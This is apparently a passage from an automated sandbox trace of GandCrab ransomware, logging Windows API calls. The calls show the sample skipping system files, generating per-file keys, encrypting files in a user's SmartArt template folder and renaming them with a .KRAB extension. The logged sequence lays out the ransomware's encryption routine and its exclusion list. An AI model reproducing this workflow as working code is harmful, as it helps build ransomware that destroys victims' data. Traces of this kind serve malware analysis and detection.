(lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="ntuser.dat") returned 1 [0072.973] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="iconcache.db") returned 1 [0072.973] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="bootsect.bak") returned 1 [0072.973] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="boot.ini") returned 1 [0072.973] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="ntuser.dat.log") returned 1 [0072.973] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="thumbs.db") returned 1 [0072.973] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0072.973] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0072.973] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.973] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="ntldr") returned 1 [0072.973] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="NTDETECT.COM") returned 1 [0072.973] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="Bootfont.bin") returned 1 [0072.973] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.973] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0072.974] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0072.974] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0072.975] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0072.975] CryptGenRandom (in: hProv=0x1012558, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0072.975] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.975] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.975] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0072.975] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0072.976] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0072.976] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0072.976] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0072.976] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.976] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.977] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0072.977] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023db8) returned 1 [0072.977] CryptGetKeyParam (in: hKey=0x1023db8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0072.977] CryptEncrypt (in: hKey=0x1023db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0072.978] GetLastError () returned 0x0 [0072.978] CryptDestroyKey (hKey=0x1023db8) returned 1 [0072.978] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.978] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0072.981] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x10239f8) returned 1 [0072.981] CryptGetKeyParam (in: hKey=0x10239f8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0072.981] CryptEncrypt (in: hKey=0x10239f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0072.981] GetLastError () returned 0x0 [0072.981] CryptDestroyKey (hKey=0x10239f8) returned 1 [0072.981] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.982] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328919[[fn=hexagon radial]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0072.982] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0072.983] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0072.983] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x1788, lpOverlapped=0x0) returned 1 [0073.037] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffe878, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.037] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x1788, lpOverlapped=0x0) returned 1 [0073.037] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0073.037] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.057] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.058] CloseHandle (hObject=0x484) returned 1 [0073.059] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.059] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328919[[fn=hexagon radial]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328919[[fn=hexagon radial]].glox.krab")) returned 1 [0073.060] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.060] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0073.060] lstrcmpW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2=".") returned 1 [0073.060] lstrcmpW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="..") returned 1 [0073.060] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328925[[fn=Interconnected Block Process]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox" [0073.060] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.061] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox.KRAB") returned 159 [0073.061] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox") returned 154 [0073.061] lstrlenW (lpString=".glox") returned 5 [0073.061] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.061] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0073.061] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.062] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox") returned 154 [0073.062] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox") returned 154 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="desktop.ini") returned 1 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="autorun.inf") returned 1 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="ntuser.dat") returned 1 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="iconcache.db") returned 1 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="bootsect.bak") returned 1 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="boot.ini") returned 1 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="ntuser.dat.log") returned 1 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="thumbs.db") returned 1 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="ntldr") returned 1 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="NTDETECT.COM") returned 1 [0073.062] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="Bootfont.bin") returned 1 [0073.062] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.063] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.063] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0073.064] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.064] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.064] CryptGenRandom (in: hProv=0x1012558, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0073.064] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.064] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.064] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.065] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0073.065] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.065] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.065] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0073.065] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.065] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.066] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.066] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023838) returned 1 [0073.066] CryptGetKeyParam (in: hKey=0x1023838, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.066] CryptEncrypt (in: hKey=0x1023838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.067] GetLastError () returned 0x0 [0073.067] CryptDestroyKey (hKey=0x1023838) returned 1 [0073.067] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.067] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.067] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023df8) returned 1 [0073.067] CryptGetKeyParam (in: hKey=0x1023df8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.067] CryptEncrypt (in: hKey=0x1023df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.068] GetLastError () returned 0x0 [0073.068] CryptDestroyKey (hKey=0x1023df8) returned 1 [0073.068] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.068] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328925[[fn=interconnected block process]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0073.093] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0073.094] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0073.094] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x23e7, lpOverlapped=0x0) returned 1 [0073.135] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffdc19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.135] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x23e7, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x23e7, lpOverlapped=0x0) returned 1 [0073.135] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0073.135] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.139] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.140] CloseHandle (hObject=0x484) returned 1 [0073.149] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.150] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328925[[fn=interconnected block process]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328925[[fn=interconnected block process]].glox.krab")) returned 1 [0073.151] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.151] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0073.151] lstrcmpW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2=".") returned 1 [0073.151] lstrcmpW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="..") returned 1 [0073.151] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328932[[fn=Picture Frame]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox" [0073.151] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.151] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox.KRAB") returned 144 [0073.152] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox") returned 139 [0073.152] lstrlenW (lpString=".glox") returned 5 [0073.152] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.152] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0073.152] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.152] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox") returned 139 [0073.152] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox") returned 139 [0073.152] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="desktop.ini") returned 1 [0073.152] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="autorun.inf") returned 1 [0073.152] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="ntuser.dat") returned 1 [0073.152] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="iconcache.db") returned 1 [0073.153] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="bootsect.bak") returned 1 [0073.153] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="boot.ini") returned 1 [0073.153] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="ntuser.dat.log") returned 1 [0073.153] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="thumbs.db") returned 1 [0073.153] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0073.153] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.153] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.153] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="ntldr") returned 1 [0073.153] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="NTDETECT.COM") returned 1 [0073.153] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="Bootfont.bin") returned 1 [0073.153] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.153] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011ab8) returned 1 [0073.154] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0073.154] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.155] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.155] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0073.155] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0073.155] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.155] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.155] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0073.156] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.156] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.156] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0073.156] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.156] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.157] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.157] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023978) returned 1 [0073.157] CryptGetKeyParam (in: hKey=0x1023978, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.157] CryptEncrypt (in: hKey=0x1023978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.158] GetLastError () returned 0x0 [0073.158] CryptDestroyKey (hKey=0x1023978) returned 1 [0073.158] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.158] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1011ab8) returned 1 [0073.158] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023b78) returned 1 [0073.158] CryptGetKeyParam (in: hKey=0x1023b78, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.158] CryptEncrypt (in: hKey=0x1023b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.159] GetLastError () returned 0x0 [0073.159] CryptDestroyKey (hKey=0x1023b78) returned 1 [0073.159] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0073.159] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328932[[fn=picture frame]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0073.159] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0073.160] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0073.160] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, 